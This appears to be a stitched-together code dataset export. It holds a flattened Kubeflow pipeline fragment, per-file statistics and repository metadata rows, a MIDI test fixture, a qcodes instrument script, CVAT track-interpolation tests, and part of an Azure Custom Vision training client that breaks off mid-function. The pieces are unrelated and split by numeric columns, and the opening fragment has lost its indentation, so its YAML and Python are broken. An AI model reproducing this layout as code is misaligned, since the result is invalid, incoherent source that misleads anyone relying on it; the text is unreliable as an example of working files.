accelerator = "nvidia-tesla-p4"
isvc_gpu_yaml = """
apiVersion: "serving.kubeflow.org/v1beta1"
kind: "InferenceService"
metadata:
name: {}
namespace: {}
spec:
predictor:
serviceAccountName: sa
pytorch:
storageUri: {}
resources:
limits:
memory: 4Gi
nvidia.com/gpu: {}
nodeSelector:
cloud.google.com/gke-accelerator: {}
""".format(deploy, namespace, model_uri, gpu_count, accelerator)
# Update inferenceservice_yaml for GPU inference
deploy_task = (
COMPONENT_DEPLOY(
action="apply", inferenceservice_yaml=isvc_yaml
).after(minio_mar_upload).set_display_name("Deployer")
)
with pytest.raises(TypeError):
compiler.Compiler().compile(
pytorch_bert, "pytorch.tar.gz", type_check=True
)
| 40.37546
| 93
| 0.451164
| 2,619
| 32,906
| 5.365025
| 0.108438
| 0.024198
| 0.033877
| 0.033307
| 0.879439
| 0.873247
| 0.873247
| 0.865988
| 0.8588
| 0.8588
| 0
| 0.008274
| 0.460068
| 32,906
| 814
| 94
| 40.425061
| 0.782574
| 0.055552
| 0
| 0.766938
| 0
| 0
| 0.281058
| 0.08251
| 0
| 0
| 0
| 0
| 0
| 1
| 0.012195
| false
| 0
| 0.01084
| 0
| 0.02439
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b96398ce2b2484870e06a3cf742d351f47fa15cc
| 4,543
|
py
|
Python
|
test/mary_test.py
|
blowfeld/python-midi-io
|
8dd5c7fabc29bc407a6fb8987538c7a9dce68d94
|
[
"MIT"
] | 1
|
2020-10-19T08:12:35.000Z
|
2020-10-19T08:12:35.000Z
|
test/mary_test.py
|
blowfeld/python-midi-io
|
8dd5c7fabc29bc407a6fb8987538c7a9dce68d94
|
[
"MIT"
] | 3
|
2017-11-18T16:46:01.000Z
|
2021-11-20T22:55:38.000Z
|
test/mary_test.py
|
blowfeld/python-midi-io
|
8dd5c7fabc29bc407a6fb8987538c7a9dce68d94
|
[
"MIT"
] | null | null | null |
from midiio.events import *
from midiio.containers import *
# Reference fixture: a two-track MIDI pattern ("Mary Had a Little Lamb",
# judging by the note sequence — TODO confirm against the test that uses it).
# Track 1 holds only meta events (time signature, key signature, end-of-track);
# track 2 holds the controller setup, program change, and the note stream.
MARY_MIDI = Pattern(tracks=[[TimeSignatureMetaEvent(tick=0, nominator=4,
    denominator=2, metronome=24, thirtyseconds_per_quarter=8),
    KeySignatureMetaEvent(tick=0, alternatives=0, minor=0),
    EndOfTrackMetaEvent(tick=1)],
    # Controller/program setup, then note-on events; note-off is encoded as
    # NoteOnEvent with velocity=0, and `tick` values are deltas.
    [ControlChangeEvent(tick=0, channel=0, control=91, value=58),
    ControlChangeEvent(tick=0, channel=0, control=10, value=69),
    ControlChangeEvent(tick=0, channel=0, control=0, value=0),
    ControlChangeEvent(tick=0, channel=0, control=32, value=0),
    ProgramChangeEvent(tick=0, channel=0, value=24),
    NoteOnEvent(tick=0, channel=0, pitch=64, velocity=72),
    NoteOnEvent(tick=0, channel=0, pitch=55, velocity=70),
    NoteOnEvent(tick=231, channel=0, pitch=64, velocity=0),
    NoteOnEvent(tick=25, channel=0, pitch=62, velocity=72),
    NoteOnEvent(tick=231, channel=0, pitch=62, velocity=0),
    NoteOnEvent(tick=25, channel=0, pitch=60, velocity=71),
    NoteOnEvent(tick=231, channel=0, pitch=60, velocity=0),
    NoteOnEvent(tick=25, channel=0, pitch=62, velocity=79),
    NoteOnEvent(tick=206, channel=0, pitch=55, velocity=0),
    NoteOnEvent(tick=25, channel=0, pitch=62, velocity=0),
    NoteOnEvent(tick=25, channel=0, pitch=64, velocity=85),
    NoteOnEvent(tick=0, channel=0, pitch=55, velocity=79),
    NoteOnEvent(tick=231, channel=0, pitch=64, velocity=0),
    NoteOnEvent(tick=25, channel=0, pitch=64, velocity=78),
    NoteOnEvent(tick=231, channel=0, pitch=64, velocity=0),
    NoteOnEvent(tick=25, channel=0, pitch=64, velocity=74),
    NoteOnEvent(tick=462, channel=0, pitch=55, velocity=0),
    NoteOnEvent(tick=0, channel=0, pitch=64, velocity=0),
    NoteOnEvent(tick=50, channel=0, pitch=62, velocity=75),
    NoteOnEvent(tick=0, channel=0, pitch=55, velocity=77),
    NoteOnEvent(tick=231, channel=0, pitch=62, velocity=0),
    NoteOnEvent(tick=25, channel=0, pitch=62, velocity=77),
    NoteOnEvent(tick=231, channel=0, pitch=62, velocity=0),
    NoteOnEvent(tick=25, channel=0, pitch=62, velocity=75),
    NoteOnEvent(tick=462, channel=0, pitch=55, velocity=0),
    NoteOnEvent(tick=0, channel=0, pitch=62, velocity=0),
    NoteOnEvent(tick=50, channel=0, pitch=64, velocity=82),
    NoteOnEvent(tick=0, channel=0, pitch=55, velocity=79),
    NoteOnEvent(tick=231, channel=0, pitch=64, velocity=0),
    NoteOnEvent(tick=25, channel=0, pitch=67, velocity=84),
    NoteOnEvent(tick=231, channel=0, pitch=67, velocity=0),
    NoteOnEvent(tick=25, channel=0, pitch=67, velocity=75),
    NoteOnEvent(tick=462, channel=0, pitch=55, velocity=0),
    NoteOnEvent(tick=0, channel=0, pitch=67, velocity=0),
    NoteOnEvent(tick=50, channel=0, pitch=64, velocity=73),
    NoteOnEvent(tick=0, channel=0, pitch=55, velocity=78),
    NoteOnEvent(tick=231, channel=0, pitch=64, velocity=0),
    NoteOnEvent(tick=25, channel=0, pitch=62, velocity=69),
    NoteOnEvent(tick=231, channel=0, pitch=62, velocity=0),
    NoteOnEvent(tick=25, channel=0, pitch=60, velocity=71),
    NoteOnEvent(tick=231, channel=0, pitch=60, velocity=0),
    NoteOnEvent(tick=25, channel=0, pitch=62, velocity=80),
    NoteOnEvent(tick=206, channel=0, pitch=55, velocity=0),
    NoteOnEvent(tick=25, channel=0, pitch=62, velocity=0),
    NoteOnEvent(tick=25, channel=0, pitch=64, velocity=84),
    NoteOnEvent(tick=0, channel=0, pitch=55, velocity=79),
    NoteOnEvent(tick=231, channel=0, pitch=64, velocity=0),
    NoteOnEvent(tick=25, channel=0, pitch=64, velocity=76),
    NoteOnEvent(tick=231, channel=0, pitch=64, velocity=0),
    NoteOnEvent(tick=25, channel=0, pitch=64, velocity=74),
    NoteOnEvent(tick=231, channel=0, pitch=64, velocity=0),
    NoteOnEvent(tick=25, channel=0, pitch=64, velocity=77),
    NoteOnEvent(tick=206, channel=0, pitch=55, velocity=0),
    NoteOnEvent(tick=25, channel=0, pitch=64, velocity=0),
    NoteOnEvent(tick=25, channel=0, pitch=62, velocity=75),
    NoteOnEvent(tick=0, channel=0, pitch=55, velocity=78),
    NoteOnEvent(tick=231, channel=0, pitch=62, velocity=0),
    NoteOnEvent(tick=25, channel=0, pitch=62, velocity=74),
    NoteOnEvent(tick=231, channel=0, pitch=62, velocity=0),
    NoteOnEvent(tick=25, channel=0, pitch=64, velocity=81),
    NoteOnEvent(tick=231, channel=0, pitch=64, velocity=0),
    NoteOnEvent(tick=25, channel=0, pitch=62, velocity=70),
    NoteOnEvent(tick=206, channel=0, pitch=55, velocity=0),
    NoteOnEvent(tick=25, channel=0, pitch=62, velocity=0),
    NoteOnEvent(tick=25, channel=0, pitch=60, velocity=73),
    NoteOnEvent(tick=0, channel=0, pitch=52, velocity=72),
    NoteOnEvent(tick=974, channel=0, pitch=60, velocity=0),
    NoteOnEvent(tick=0, channel=0, pitch=52, velocity=0),
    EndOfTrackMetaEvent(tick=1)]])
| 55.402439
| 72
| 0.727933
| 693
| 4,543
| 4.767677
| 0.096681
| 0.176755
| 0.267554
| 0.239709
| 0.889225
| 0.889225
| 0.837772
| 0.837772
| 0.767252
| 0.767252
| 0
| 0.120461
| 0.102796
| 4,543
| 81
| 73
| 56.08642
| 0.690137
| 0
| 0
| 0.475
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.025
| 0
| 0.025
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b99bd3b92b519f97dbae3f9de4f6bd514101848e
| 1,194
|
py
|
Python
|
simple_codes.py
|
takafumifujita/qcodes-driver-test-TF
|
75cb0cb44a82dd62de8872698ced7dbd16c104dc
|
[
"MIT"
] | null | null | null |
simple_codes.py
|
takafumifujita/qcodes-driver-test-TF
|
75cb0cb44a82dd62de8872698ced7dbd16c104dc
|
[
"MIT"
] | null | null | null |
simple_codes.py
|
takafumifujita/qcodes-driver-test-TF
|
75cb0cb44a82dd62de8872698ced7dbd16c104dc
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Interactive (cell-based) scratch script for driving Oxford Instruments
drivers through qcodes: an ILM200 helium level meter and an IPS120 magnet
power supply. Cells are delimited with "#%%" for execution in an IDE such
as Spyder; this file is not meant to be run top-to-bottom as a program.

Created on Wed Dec 14 11:31:28 2016
@author: tfujita
"""
#%% ILM
#%% First load
import qcodes
import qcodes.instrument_drivers.oxford.ILM200 as ILM200
server_name = None
# NOTE(review): both instruments use address 'ASRL4::INSTR' — presumably they
# are attached on different occasions, not simultaneously; confirm.
helium = ILM200.OxfordInstruments_ILM200(name='helium', address='ASRL4::INSTR', server_name=server_name)
#%% Reloading
# Re-import the driver module after editing it, then recreate the instrument.
helium.close()
# NOTE(review): `imp` has been deprecated since Python 3.4;
# `importlib.reload` is the modern equivalent — confirm before changing.
from imp import reload
reload(qcodes.instrument_drivers.oxford.ILM200)
import qcodes.instrument_drivers.oxford.ILM200 as ILM200
server_name = None
helium = ILM200.OxfordInstruments_ILM200(name='helium', address='ASRL4::INSTR', server_name=server_name)
#%%
# Debug cell: inspect the VISA buffer of the level meter.
self = helium
self.visa_handle.bytes_in_buffer
#%%
#%% IPS
import qcodes
import qcodes.instrument_drivers.oxford.IPS120 as IPS120
server_name = None
magnet = IPS120.OxfordInstruments_IPS120(name='magnet', address='ASRL4::INSTR', server_name=server_name)
#%% Reloading
# Same reload dance for the magnet driver.
magnet.close()
from imp import reload
reload(qcodes.instrument_drivers.oxford.IPS120)
import qcodes.instrument_drivers.oxford.IPS120 as IPS120
server_name = None
magnet = IPS120.OxfordInstruments_IPS120(name='magnet', address='ASRL4::INSTR', server_name=server_name)
#%%
# Debug cell: inspect the VISA buffer of the magnet supply.
self = magnet
self.visa_handle.bytes_in_buffer
| 20.586207
| 104
| 0.779732
| 160
| 1,194
| 5.64375
| 0.2875
| 0.13289
| 0.152824
| 0.192691
| 0.90144
| 0.888151
| 0.82835
| 0.801772
| 0.772979
| 0.772979
| 0
| 0.066231
| 0.102178
| 1,194
| 57
| 105
| 20.947368
| 0.776119
| 0.109715
| 0
| 0.75
| 0
| 0
| 0.068768
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 9
|
b9bbd6f0b8648af296ef3bfda076899cccae66d7
| 9,419
|
py
|
Python
|
cvat/apps/dataset_manager/tests/test_annotation.py
|
gitibharatibiswal/cvat-adas-team
|
a33c1ae38d79ed6e35a61a97b74cd2978853e4c2
|
[
"Intel",
"MIT"
] | 2
|
2022-03-13T03:45:15.000Z
|
2022-03-13T03:46:19.000Z
|
cvat/apps/dataset_manager/tests/test_annotation.py
|
gitibharatibiswal/cvat-adas-team
|
a33c1ae38d79ed6e35a61a97b74cd2978853e4c2
|
[
"Intel",
"MIT"
] | 9
|
2021-07-15T13:42:33.000Z
|
2021-09-22T12:43:07.000Z
|
cvat/apps/dataset_manager/tests/test_annotation.py
|
gitibharatibiswal/cvat-adas-team
|
a33c1ae38d79ed6e35a61a97b74cd2978853e4c2
|
[
"Intel",
"MIT"
] | 41
|
2020-12-16T05:52:41.000Z
|
2021-09-23T08:45:16.000Z
|
# Copyright (C) 2020 Intel Corporation
#
# SPDX-License-Identifier: MIT
from cvat.apps.dataset_manager.annotation import TrackManager
from unittest import TestCase
class TrackManagerTest(TestCase):
    def _check_interpolation(self, track):
        """Interpolate *track* over frames [0, 7) and verify keyframe flags.

        Expects six interpolated shapes, with frames 0, 2 and 3 flagged as
        keyframes and the rest interpolated. (The fixtures that call this
        define explicit shapes on frames 0, 2 and 4, frame 2 being
        "outside" — presumably frame 3 is the post-outside keyframe;
        confirm against TrackManager's interpolation semantics.)
        """
        interpolated = TrackManager.get_interpolated_shapes(track, 0, 7)
        self.assertEqual(len(interpolated), 6)
        self.assertTrue(interpolated[0]["keyframe"])
        self.assertFalse(interpolated[1]["keyframe"])
        self.assertTrue(interpolated[2]["keyframe"])
        self.assertTrue(interpolated[3]["keyframe"])
        self.assertFalse(interpolated[4]["keyframe"])
        self.assertFalse(interpolated[5]["keyframe"])
    def test_point_interpolation(self):
        """Keyframe flags for a "points" track with shapes on frames 0, 2, 4."""
        track = {
            "frame": 0,
            "label_id": 0,
            "group": None,
            "source": "manual",
            "attributes": [],
            "shapes": [
                {
                    "frame": 0,
                    "points": [1.0, 2.0],
                    "type": "points",
                    "occluded": False,
                    "outside": False,
                    "attributes": []
                },
                # Frame 2 is "outside": the point leaves the scene here.
                {
                    "frame": 2,
                    "attributes": [],
                    "points": [3.0, 4.0, 5.0, 6.0],
                    "type": "points",
                    "occluded": False,
                    "outside": True
                },
                {
                    "frame": 4,
                    "attributes": [],
                    "points": [3.0, 4.0, 5.0, 6.0],
                    "type": "points",
                    "occluded": False,
                    "outside": False
                },
            ]
        }
        self._check_interpolation(track)
def test_polygon_interpolation(self):
track = {
"frame": 0,
"label_id": 0,
"group": None,
"attributes": [],
"source": "manual",
"shapes": [
{
"frame": 0,
"points": [1.0, 2.0, 3.0, 4.0, 5.0, 2.0],
"type": "polygon",
"occluded": False,
"outside": False,
"attributes": []
},
{
"frame": 2,
"attributes": [],
"points": [3.0, 4.0, 5.0, 6.0, 7.0, 6.0, 4.0, 5.0],
"type": "polygon",
"occluded": False,
"outside": True
},
{
"frame": 4,
"attributes": [],
"points": [3.0, 4.0, 5.0, 6.0, 7.0, 6.0, 4.0, 5.0],
"type": "polygon",
"occluded": False,
"outside": False
},
]
}
self._check_interpolation(track)
def test_bbox_interpolation(self):
track = {
"frame": 0,
"label_id": 0,
"group": None,
"attributes": [],
"source": "manual",
"shapes": [
{
"frame": 0,
"points": [1.0, 2.0, 3.0, 4.0],
"type": "rectangle",
"occluded": False,
"outside": False,
"attributes": []
},
{
"frame": 2,
"attributes": [],
"points": [3.0, 4.0, 5.0, 6.0],
"type": "rectangle",
"occluded": False,
"outside": True
},
{
"frame": 4,
"attributes": [],
"points": [3.0, 4.0, 5.0, 6.0],
"type": "rectangle",
"occluded": False,
"outside": False
},
]
}
self._check_interpolation(track)
def test_line_interpolation(self):
track = {
"frame": 0,
"label_id": 0,
"group": None,
"attributes": [],
"source": "manual",
"shapes": [
{
"frame": 0,
"points": [1.0, 2.0, 3.0, 4.0, 5.0, 6.0],
"type": "polyline",
"occluded": False,
"outside": False,
"attributes": []
},
{
"frame": 2,
"attributes": [],
"points": [3.0, 4.0, 5.0, 6.0],
"type": "polyline",
"occluded": False,
"outside": True
},
{
"frame": 4,
"attributes": [],
"points": [3.0, 4.0, 5.0, 6.0],
"type": "polyline",
"occluded": False,
"outside": False
},
]
}
self._check_interpolation(track)
def test_outside_bbox_interpolation(self):
track = {
"frame": 0,
"label_id": 0,
"group": None,
"attributes": [],
"source": "manual",
"shapes": [
{
"frame": 0,
"points": [1.0, 2.0, 3.0, 4.0],
"type": "rectangle",
"occluded": False,
"outside": False,
"attributes": []
},
{
"frame": 2,
"points": [3.0, 4.0, 5.0, 6.0],
"type": "rectangle",
"occluded": False,
"outside": True,
"attributes": [],
},
{
"frame": 4,
"points": [5.0, 6.0, 7.0, 8.0],
"type": "rectangle",
"occluded": False,
"outside": True,
"attributes": []
}
]
}
expected_shapes = [
{
"frame": 0,
"points": [1.0, 2.0, 3.0, 4.0],
"type": "rectangle",
"occluded": False,
"outside": False,
"attributes": [],
"keyframe": True
},
{
"frame": 1,
"points": [2.0, 3.0, 4.0, 5.0],
"type": "rectangle",
"occluded": False,
"outside": False,
"attributes": [],
"keyframe": False
},
{
"frame": 2,
"points": [3.0, 4.0, 5.0, 6.0],
"type": "rectangle",
"occluded": False,
"outside": True,
"attributes": [],
"keyframe": True
},
{
"frame": 4,
"points": [5.0, 6.0, 7.0, 8.0],
"type": "rectangle",
"occluded": False,
"outside": True,
"attributes": [],
"keyframe": True
}
]
interpolated_shapes = TrackManager.get_interpolated_shapes(track, 0, 5)
self.assertEqual(expected_shapes, interpolated_shapes)
def test_outside_polygon_interpolation(self):
track = {
"frame": 0,
"label_id": 0,
"group": None,
"attributes": [],
"source": "manual",
"shapes": [
{
"frame": 0,
"points": [1.0, 2.0, 3.0, 4.0, 5.0, 6.0],
"type": "polygon",
"occluded": False,
"outside": False,
"attributes": []
},
{
"frame": 2,
"points": [3.0, 4.0, 5.0, 6.0, 7.0, 8.0],
"type": "polygon",
"occluded": False,
"outside": True,
"attributes": []
}
]
}
expected_shapes = [
{
"frame": 0,
"points": [1.0, 2.0, 3.0, 4.0, 5.0, 6.0],
"type": "polygon",
"occluded": False,
"outside": False,
"attributes": [],
"keyframe": True
},
{
"frame": 1,
"points": [2.0, 3.0, 4.0, 5.0, 6.0, 7.0],
"type": "polygon",
"occluded": False,
"outside": False,
"attributes": [],
"keyframe": False
},
{
"frame": 2,
"points": [3.0, 4.0, 5.0, 6.0, 7.0, 8.0],
"type": "polygon",
"occluded": False,
"outside": True,
"attributes": [],
"keyframe": True
}
]
interpolated_shapes = TrackManager.get_interpolated_shapes(track, 0, 3)
self.assertEqual(expected_shapes, interpolated_shapes)
| 30.781046
| 79
| 0.331776
| 712
| 9,419
| 4.325843
| 0.091292
| 0.038961
| 0.155844
| 0.027273
| 0.833766
| 0.833766
| 0.790584
| 0.787338
| 0.780195
| 0.772403
| 0
| 0.06393
| 0.526701
| 9,419
| 305
| 80
| 30.881967
| 0.626963
| 0.006901
| 0
| 0.696113
| 0
| 0
| 0.163422
| 0
| 0
| 0
| 0
| 0
| 0.031802
| 1
| 0.024735
| false
| 0
| 0.007067
| 0
| 0.035336
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b9c93e6cd9d835b043e12de4a1ef06b0db855651
| 133,264
|
py
|
Python
|
sdk/cognitiveservices/azure-cognitiveservices-vision-customvision/azure/cognitiveservices/vision/customvision/training/operations/_custom_vision_training_client_operations.py
|
iscai-msft/azure-sdk-for-python
|
83715b95c41e519d5be7f1180195e2fba136fc0f
|
[
"MIT"
] | 1
|
2020-12-10T03:17:51.000Z
|
2020-12-10T03:17:51.000Z
|
sdk/cognitiveservices/azure-cognitiveservices-vision-customvision/azure/cognitiveservices/vision/customvision/training/operations/_custom_vision_training_client_operations.py
|
iscai-msft/azure-sdk-for-python
|
83715b95c41e519d5be7f1180195e2fba136fc0f
|
[
"MIT"
] | 226
|
2019-07-24T07:57:21.000Z
|
2019-10-15T01:07:24.000Z
|
sdk/cognitiveservices/azure-cognitiveservices-vision-customvision/azure/cognitiveservices/vision/customvision/training/operations/_custom_vision_training_client_operations.py
|
iscai-msft/azure-sdk-for-python
|
83715b95c41e519d5be7f1180195e2fba136fc0f
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from .. import models
class CustomVisionTrainingClientOperationsMixin(object):
def get_domains(
self, custom_headers=None, raw=False, **operation_config):
"""Get a list of the available domains.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: list or ClientRawResponse if raw=true
:rtype:
list[~azure.cognitiveservices.vision.customvision.training.models.Domain]
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.get_domains.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('[Domain]', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_domains.metadata = {'url': '/domains'}
def get_domain(
self, domain_id, custom_headers=None, raw=False, **operation_config):
"""Get information about a specific domain.
:param domain_id: The id of the domain to get information about.
:type domain_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Domain or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.Domain or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.get_domain.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'domainId': self._serialize.url("domain_id", domain_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Domain', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_domain.metadata = {'url': '/domains/{domainId}'}
def get_projects(
self, custom_headers=None, raw=False, **operation_config):
"""Get your projects.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: list or ClientRawResponse if raw=true
:rtype:
list[~azure.cognitiveservices.vision.customvision.training.models.Project]
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.get_projects.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('[Project]', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_projects.metadata = {'url': '/projects'}
def create_project(
self, name, description=None, domain_id=None, classification_type=None, target_export_platforms=None, custom_headers=None, raw=False, **operation_config):
"""Create a project.
:param name: Name of the project.
:type name: str
:param description: The description of the project.
:type description: str
:param domain_id: The id of the domain to use for this project.
Defaults to General.
:type domain_id: str
:param classification_type: The type of classifier to create for this
project. Possible values include: 'Multiclass', 'Multilabel'
:type classification_type: str
:param target_export_platforms: List of platforms the trained model is
intending exporting to.
:type target_export_platforms: list[str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Project or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.Project
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.create_project.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True)
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['name'] = self._serialize.query("name", name, 'str')
if description is not None:
query_parameters['description'] = self._serialize.query("description", description, 'str')
if domain_id is not None:
query_parameters['domainId'] = self._serialize.query("domain_id", domain_id, 'str')
if classification_type is not None:
query_parameters['classificationType'] = self._serialize.query("classification_type", classification_type, 'str')
if target_export_platforms is not None:
query_parameters['targetExportPlatforms'] = self._serialize.query("target_export_platforms", target_export_platforms, '[str]', div=',')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Project', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create_project.metadata = {'url': '/projects'}
def get_project(
self, project_id, custom_headers=None, raw=False, **operation_config):
"""Get a specific project.
:param project_id: The id of the project to get.
:type project_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Project or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.Project
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.get_project.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Project', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_project.metadata = {'url': '/projects/{projectId}'}
def delete_project(
self, project_id, custom_headers=None, raw=False, **operation_config):
"""Delete a specific project.
:param project_id: The project id.
:type project_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.delete_project.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [204]:
raise models.CustomVisionErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
delete_project.metadata = {'url': '/projects/{projectId}'}
def update_project(
self, project_id, updated_project, custom_headers=None, raw=False, **operation_config):
"""Update a specific project.
:param project_id: The id of the project to update.
:type project_id: str
:param updated_project: The updated project model.
:type updated_project:
~azure.cognitiveservices.vision.customvision.training.models.Project
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Project or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.Project
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.update_project.metadata['url']
path_format_arguments = {
